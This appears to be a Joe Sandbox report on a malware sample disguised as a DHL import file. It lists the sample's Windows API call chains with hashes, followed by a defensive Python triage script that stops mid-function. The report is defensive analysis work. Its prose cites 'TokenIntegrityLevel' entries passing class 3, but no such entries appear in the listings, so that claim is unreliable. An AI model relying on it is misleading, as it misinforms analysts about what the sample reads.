                                                                                          • Opcode Fuzzy Hash: 81681e0811f55dee0a1fb6e5ecc518ee3e040ad39f33e2f577e67d5ecf76fe92
                                                                                          • Instruction Fuzzy Hash: 6131A27090434A9EFF35CB75984CBB6BFA8FB17304F040569E4A2C29A0E7F49A85CB11
                                                                                          APIs
                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CF38
                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0084CF6F
                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFB4
                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFC8
                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0084C21E,00000000), ref: 0084CFF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                          • String ID:
                                                                                          • API String ID: 3191363074-0
                                                                                          • Opcode ID: 9bdf9be55b2e880b2b86adce5f6e971cf6a481bc6e4d808d29fc8431ba5d9e10
                                                                                          • Instruction ID: 1eef0b99a61d52a74a60a04fdfc7d779ea2821615e87fc99600fd0acd4873d8b
                                                                                          • Opcode Fuzzy Hash: 9bdf9be55b2e880b2b86adce5f6e971cf6a481bc6e4d808d29fc8431ba5d9e10
                                                                                          • Instruction Fuzzy Hash: EE317C71601209EFDB60DFA5C884AABBBFDFB14314B10442EF506D2201DBB8AE449B60
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 00831915
                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 008319C1
                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 008319C9
                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 008319DA
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 008319E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3382505437-0
                                                                                          • Opcode ID: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
                                                                                          • Instruction ID: 96290250ead829fdda8c80b5262d804e2e9dece0de48b46a2bd86cc1bc305324
                                                                                          • Opcode Fuzzy Hash: 595175a7e1510984a45d84e33cdb19f69f6bf0bcbc7de3b95161e24b23c19142
                                                                                          • Instruction Fuzzy Hash: 8B318C71A00219AFCB04CFA8C999BAE3BB5FB45715F504229F961E72D1C7B09954CB90
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00865745
                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0086579D
                                                                                          • _wcslen.LIBCMT ref: 008657AF
                                                                                          • _wcslen.LIBCMT ref: 008657BA
                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00865816
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 763830540-0
                                                                                          • Opcode ID: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
                                                                                          • Instruction ID: b47482522c79b97125905bc87a323f167c7214f2307f8bdc7c1b348f01b45eb3
                                                                                          • Opcode Fuzzy Hash: 38a5aa81f7189a9fe0211fae387d8ca230a0a4ef595d596c23c6c9da2385154c
                                                                                          • Instruction Fuzzy Hash: D521B67190461CDADB208F60CC84AEE7BB8FF04724F118256F929EB280DB749985CF50
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000008), ref: 007E98CC
                                                                                          • SetTextColor.GDI32(?,?), ref: 007E98D6
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007E98E9
                                                                                          • GetStockObject.GDI32(00000005), ref: 007E98F1
                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$LongModeObjectStockTextWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1860813098-0
                                                                                          • Opcode ID: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
                                                                                          • Instruction ID: bf8de58bf2b48a27cbf325c333f37efa6b1c1b5f438e338e3cddc7ee0a493e85
                                                                                          • Opcode Fuzzy Hash: 6eddec52540ae05a32eee16e056dd7ec444d00866516f95f8b8ee3c3bb5505de
                                                                                          • Instruction Fuzzy Hash: 8D2126724462D09FCB228F36EC58AE53FA0AF5B331F09019DE6928A1A2D77D5990CB50
                                                                                          APIs
                                                                                          • IsWindow.USER32(00000000), ref: 00850951
                                                                                          • GetForegroundWindow.USER32 ref: 00850968
                                                                                          • GetDC.USER32(00000000), ref: 008509A4
                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 008509B0
                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 008509E8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                          • String ID:
                                                                                          • API String ID: 4156661090-0
                                                                                          • Opcode ID: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
                                                                                          • Instruction ID: 6ea83cb1a64d0a839caaa5c9ad13f3dc30082e7346128be0ff4ee43adf4f58bc
                                                                                          • Opcode Fuzzy Hash: 93e01f550b55d523f1487c698deaea09021a4f99817c26ccca3726e8444b4c98
                                                                                          • Instruction Fuzzy Hash: AE215E35A00204AFD704EF69D888AAEBBF5FF58701F05806DE84AD7352CA74AC44CB50
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0080CDC6
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0080CDE9
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0080CE0F
                                                                                          • _free.LIBCMT ref: 0080CE22
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0080CE31
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                          • String ID:
                                                                                          • API String ID: 336800556-0
                                                                                          • Opcode ID: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
                                                                                          • Instruction ID: 37c45910c2738f3263cfdd9373546b5702ca26e6cd0eface0628250e15a3ac5f
                                                                                          • Opcode Fuzzy Hash: d763238c30efed94a8dc3c56f716537dc803184f71ad1bc49c3431777e63f43b
                                                                                          • Instruction Fuzzy Hash: AC0175726012157FA3611FBAEC4CD7B796DFEC6BA13150229FD05D6281DA618D0191B1
                                                                                          APIs
                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E96A2
                                                                                          • BeginPath.GDI32(?), ref: 007E96B9
                                                                                          • SelectObject.GDI32(?,00000000), ref: 007E96E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
                                                                                          • Instruction ID: 9833b296457b68698884e5fc11e43f17470eedc70002feb1d20accab26943e7b
                                                                                          • Opcode Fuzzy Hash: 9c466df31c6c10ee1fad4b28a591f207d3ebf9dc98f7f1f8b7e325ba4559d492
                                                                                          • Instruction Fuzzy Hash: D8218032802385EBEF119F26EC1C7AA7FA8BB06355F540216F510A65B0D3B85992CB95
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memcmp
                                                                                          • String ID:
                                                                                          • API String ID: 2931989736-0
                                                                                          • Opcode ID: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
                                                                                          • Instruction ID: 2bb5f47a2af9611ef6f6d840a73355d62b5926c004f850489156df8560c28762
                                                                                          • Opcode Fuzzy Hash: 32daae4a8f38b24596a3a3d1935de0e88f89d74e79f1276d14f84c87e6f5215d
                                                                                          • Instruction Fuzzy Hash: 4301926164561DFAD6085510AD82EBA635DFFA13A8F814020FE14DA342F668ED10C2E0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,007FF2DE,00803863,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6), ref: 00802DFD
                                                                                          • _free.LIBCMT ref: 00802E32
                                                                                          • _free.LIBCMT ref: 00802E59
                                                                                          • SetLastError.KERNEL32(00000000,007D1129), ref: 00802E66
                                                                                          • SetLastError.KERNEL32(00000000,007D1129), ref: 00802E6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_free
                                                                                          • String ID:
                                                                                          • API String ID: 3170660625-0
                                                                                          • Opcode ID: 4d8155609ae627cc2ca508cc7fcdc02d1f111d2e59b14760d5012c1125d3e448
                                                                                          • Instruction ID: e656eefbfb9a9ec63dec56660faadf4020310c36e474bf22c9bc39bdb22d004f
                                                                                          • Opcode Fuzzy Hash: 4d8155609ae627cc2ca508cc7fcdc02d1f111d2e59b14760d5012c1125d3e448
                                                                                          • Instruction Fuzzy Hash: 1B0128362856006BC6927738AC4ED2B2A5DFFD13B9B350029F965E23E3EFF48C014121
                                                                                          APIs
                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064
                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830070
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 3897988419-0
                                                                                          • Opcode ID: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
                                                                                          • Instruction ID: 6f875fd63380c677171821aa7c090ec9124e575df0da376b115ffda4c67d79ed
                                                                                          • Opcode Fuzzy Hash: ba6f2b02e64848e0628e09b10413a46a5f66706316bad298ed33be47c807c383
                                                                                          • Instruction Fuzzy Hash: 2001DB72600608BFDB209F68DC54BAA7AADFB88792F118024F845D3210E7B4CD008BA0
                                                                                          APIs
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0083E997
                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0083E9A5
                                                                                          • Sleep.KERNEL32(00000000), ref: 0083E9AD
                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0083E9B7
                                                                                          • Sleep.KERNEL32 ref: 0083E9F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                          • String ID:
                                                                                          • API String ID: 2833360925-0
                                                                                          • Opcode ID: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
                                                                                          • Instruction ID: a28746ea985f5f47e013a6f06d755426fd30c4aab0539cae8e4b11a6c6b7f0b6
                                                                                          • Opcode Fuzzy Hash: acab8a6654d5d8fedba8883e00bcfdf8ef716c92bd7488e84cd25d1882d402ec
                                                                                          • Instruction Fuzzy Hash: D2011331C0162DDBCF00ABE5DC59AEDBF78FF49702F010556E942F2281CB7096568BA2
                                                                                          APIs
                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 842720411-0
                                                                                          • Opcode ID: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
                                                                                          • Instruction ID: 1e3d2e2acc5f935433016e66911858276e93d87e8a1d4a180067158f14f3349f
                                                                                          • Opcode Fuzzy Hash: 8327ab4b339cea44a116f872f39ea7836eec1a5f15710f73850b456159911540
                                                                                          • Instruction Fuzzy Hash: 8B011975200205BFDB114FA9DC4DAAA3B6EFF8A7A0F215419FA85D7360DA71DC009A60
                                                                                          APIs
                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00830FCA
                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00830FD6
                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00830FE5
                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00830FEC
                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00831002
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                          • String ID:
                                                                                          • API String ID: 44706859-0
                                                                                          • Opcode ID: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
                                                                                          • Instruction ID: f604407330ebf52de8f568a9d5083e5b6d14931f4b65e337c0f859e595bad91c
                                                                                          • Opcode Fuzzy Hash: d5d6e08733232b4735d94fadb557b40ba00bd9552a015bca174b169741f17ea9
                                                                                          • Instruction Fuzzy Hash: 8FF06D35200701FBDB214FA5DC5DF663BADFF8AB62F125414FA89D7251CAB1DC408AA0
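Reading these API chains by hand does not scale, so here is a small triage script, added for this page and not part of Joe Sandbox or of the sample, that parses entries in exactly this format (the bullet `Name.MODULE(args), ref: address` lines, `Part of subcall function` lines, and the `API ID` / fuzzy-hash identifiers) and flags three things the listings on this page show: the QueryPerformanceCounter / Sleep / QueryPerformanceCounter pattern behind the "execution timing" signature, GetDC plus GetPixel screen sampling, and every GetTokenInformation call together with the TOKEN_INFORMATION_CLASS it asks for. The class-name table and the widening of the timing rule to GetTickCount, GetTickCount64, timeGetTime and SleepEx are assumptions taken from winnt.h, not from this report; the embedded SAMPLE_LISTING is copied, abridged, from three entries on this page. One thing it surfaces: the TokenIntegrityLevel entries below pass class 3, which winnt.h defines as TokenPrivileges (TokenIntegrityLevel is 25), so the label the plugin attached and the numeric argument disagree, and the disassembly at 0083102A should be checked before concluding which token property the sample reads.

```python
"""Triage helper for Joe Sandbox per-function API listings. Added example, not Joe Sandbox code; SAMPLE_LISTING is
copied (abridged) from this page. TOKEN_INFORMATION_CLASS numbering and the timer/delay sets come from winnt.h."""
import re
from dataclasses import dataclass, field

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)  # (api, module, args, ref, subcall_parent) in listing order
    meta: dict = field(default_factory=dict)   # "API ID", "Opcode ID", "Instruction Fuzzy Hash", ...

# "• Name.MODULE(args), ref: 0083E997" or "• Name.MODULE ref: 0083E9F3"; subcall lines carry the callee address
API_LINE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>[A-Za-z_]\w*)"
                      r"\.(?P<mod>[A-Za-z0-9_]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$")
META_LINE = re.compile(r"^•\s*(?P<key>API ID|Opcode ID|Instruction ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):"
                       r"\s*(?P<val>.*)$")
CLASS_ARG = re.compile(r"^([0-9A-Fa-f]{8})(?:\((\w+)\))?$")  # "00000002" or "00000003(TokenIntegrityLevel)"
# Assumption: winnt.h TOKEN_INFORMATION_CLASS values, only the classes this example cares about
TOKEN_INFORMATION_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                           18: "TokenElevationType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}
TIMERS = {"QueryPerformanceCounter", "GetTickCount", "GetTickCount64", "timeGetTime"}
DELAYS = {"Sleep", "SleepEx"}

def parse_listing(text):
    """One FunctionEntry per 'APIs' header; bullet lines that are neither a call nor an ID are ignored."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionEntry()
            entries.append(current)
        elif current is not None:
            if m := API_LINE.match(line):
                current.calls.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
            elif m := META_LINE.match(line):
                current.meta[m["key"]] = m["val"].strip()
    return entries

def has_timing_check(entry):
    """Timer read, then a delay, then another timer read, on the function's own calls (subcalls excluded)."""
    state = 0
    for api, _mod, _args, _ref, sub in entry.calls:
        if sub is not None:
            continue
        if state == 0 and api in TIMERS:
            state = 1
        elif state == 1 and api in DELAYS:
            state = 2
        elif state == 2 and api in TIMERS:
            return True
    return False

def samples_screen(entry):
    """GetDC plus GetPixel in one function: the code reads pixels straight off the desktop."""
    return {"GetDC", "GetPixel"} <= {c[0] for c in entry.calls}

def token_queries(entry):
    """(ref, class number, label the report attached, winnt.h name) for each GetTokenInformation call."""
    out = []
    for api, _mod, args, ref, _sub in entry.calls:
        parts = [p.strip() for p in args.split(",")]
        m = CLASS_ARG.match(parts[1]) if api == "GetTokenInformation" and len(parts) > 1 else None
        if m:  # no match ("?") means the sandbox could not resolve the argument
            cls = int(m.group(1), 16)
            out.append((ref, cls, m.group(2), TOKEN_INFORMATION_CLASS.get(cls)))
    return out

def triage(text):
    """(finding, detail) pairs over every entry in the listing."""
    findings = []
    for i, entry in enumerate(parse_listing(text)):
        tag = entry.meta.get("API ID", f"entry#{i}")
        if has_timing_check(entry):
            findings.append(("timing-check", tag))
        if samples_screen(entry):
            findings.append(("screen-pixel-sampling", tag))
        for ref, cls, label, name in token_queries(entry):
            if label and name and label != name:
                findings.append(("token-class-label-mismatch",
                                 f"{tag} ref {ref}: class {cls} is {name} in winnt.h, report labels it {label}"))
            else:
                findings.append(("token-query", f"{tag} ref {ref}: class {cls} ({name or label or 'unknown'})"))
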